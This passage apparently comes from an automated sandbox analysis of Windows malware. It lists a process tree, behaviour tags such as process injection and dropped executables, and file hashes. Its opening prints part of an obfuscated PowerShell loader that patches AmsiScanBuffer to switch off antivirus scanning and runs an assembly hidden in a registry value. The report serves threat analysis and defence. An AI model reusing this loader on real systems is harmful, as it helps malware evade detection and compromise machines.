IntPtr).GetType(),[string]),$Null);$kPfeOtfSppYuDhZfdvK=EhbPppVxgsaJ @([String])([IntPtr]);$YJuhwQrQSjbwiXwieVUYVx=EhbPppVxgsaJ @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$gIZmRYJWTOl=$tAaprRSgsHKNj.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+'M'+'o'+''+'d'+'u'+[Char](108)+''+'e'+''+[Char](72)+''+'a'+'n'+[Char](100)+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object]('k'+[Char](101)+''+'r'+''+[Char](110)+''+'e'+'l'+[Char](51)+''+'2'+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$BcajSzdCFGbIoc=$LjUYWeHKnsamcX.Invoke($Null,@([Object]$gIZmRYJWTOl,[Object](''+'L'+'o'+'a'+''+'d'+'L'+'i'+''+'b'+'r'+[Char](97)+''+'r'+''+[Char](121)+'A')));$SdiqiJqCJuEfwnsjr=$LjUYWeHKnsamcX.Invoke($Null,@([Object]$gIZmRYJWTOl,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+[Char](97)+'l'+'P'+'r'+[Char](111)+'t'+'e'+''+'c'+'t')));$hEUvVLv=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BcajSzdCFGbIoc,$kPfeOtfSppYuDhZfdvK).Invoke(''+'a'+''+[Char](109)+'si'+[Char](46)+'d'+[Char](108)+''+[Char](108)+'');$eGACJWvuJJHLdTQIS=$LjUYWeHKnsamcX.Invoke($Null,@([Object]$hEUvVLv,[Object]('Am'+[Char](115)+''+[Char](105)+''+[Char](83)+'can'+'B'+'u'+[Char](102)+''+[Char](102)+'e'+[Char](114)+'')));$MwILjvenCF=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SdiqiJqCJuEfwnsjr,$YJuhwQrQSjbwiXwieVUYVx).Invoke($eGACJWvuJJHLdTQIS,[uint32]8,4,[ref]$MwILjvenCF);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$eGACJWvuJJHLdTQIS,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SdiqiJqCJuEfwnsjr,$YJuhwQrQSjbwiXwieVUYVx).Invoke($eGACJWvuJJHLdTQIS,[uint32]8,0x20,[ref]$MwILjvenCF);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+[Char](70)+''+[Char](84)+'W'+'A'+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](68)+''+[Char](101)+''+[Char](97)+''+[Char](100)+''+'s'+''+[Char](116)+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2516
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1248
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1296
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1328
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1412
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:3008
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1516
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1548
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1556
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1672
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1712
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1736
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1776
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1812
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1944
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:2024
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:2032
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1696
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:1764
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2092
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2216
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2352
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2360
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2488
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵PID:2576
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2616
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2652
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2672
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2688
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:2948
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:64
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:3228
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3372
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3452
-
C:\Users\Admin\AppData\Local\Temp\DeadPayload.exe"C:\Users\Admin\AppData\Local\Temp\DeadPayload.exe"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2904 -
C:\Users\Public\DeadMan.exe"C:\Users\Public\DeadMan.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1384
-
-
C:\Users\Public\DeadRoot.exe"C:\Users\Public\DeadRoot.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:752
-
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /42⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2788
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3564
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3772
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3944
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3696
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
- Modifies data under HKEY_USERS
PID:4492
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:4240
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:4448
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:5032
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵PID:1924
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:2000
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:4636
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:2440
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:4460
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:1208
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4328
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:1588
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe d0bfda12ab1e72f796f6b0105d7a94ba Uk7hQ/C4rkeinM4niEKzeQ.0.1.0.0.01⤵PID:1960
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:4368
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵PID:1964
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵PID:2284
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:2348
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵PID:4752
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1408
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
34KB
MD598b90748bb1bac3ca2333277b73923f8
SHA19fc96e64ebf90e98030cb701674b67f9e2c3cc0a
SHA256808ac699a3084328563971bc10c6d3b2c4c95b916a454c2a6f645173e8536da3
SHA512aac113000f209bd307b0c8410574051d5e63a196a2af103694b66edaec8eebf10d4952cdf5ed2172fa047b439bef27b87efea984cddc906a3c1a33a143768a34
-
Filesize
151KB
MD5b8479a23c22cf6fc456e197939284069
SHA1b2d98cc291f16192a46f363d007e012d45c63300
SHA25618294ee5a6383a48d1bcf2703f17d815529df3a17580e027c3efea1800900e8f
SHA512786cd468ce3723516dc869b09e008ec5d35d1f0c1a61e70083a3be15180866be637bd7d8665c2f0218c56875a0ee597c277e088f77dd403bdd2182d06bad3bd4
-
Filesize
2KB
MD58abf2d6067c6f3191a015f84aa9b6efe
SHA198f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7
SHA256ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea
SHA512c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63
-
Filesize
2KB
MD5f313c5b4f95605026428425586317353
SHA106be66fa06e1cffc54459c38d3d258f46669d01a
SHA256129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b
SHA512b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890
-
Filesize
2KB
MD5ceb7caa4e9c4b8d760dbf7e9e5ca44c5
SHA1a3879621f9493414d497ea6d70fbf17e283d5c08
SHA25698c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9
SHA5121eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff
-
Filesize
2KB
MD57d612892b20e70250dbd00d0cdd4f09b
SHA163251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5
SHA256727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02
SHA512f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1
-
Filesize
2KB
MD51e8e2076314d54dd72e7ee09ff8a52ab
SHA15fd0a67671430f66237f483eef39ff599b892272
SHA25655f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f
SHA5125b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6
-
Filesize
2KB
MD50b990e24f1e839462c0ac35fef1d119e
SHA19e17905f8f68f9ce0a2024d57b537aa8b39c6708
SHA256a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a
SHA512c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82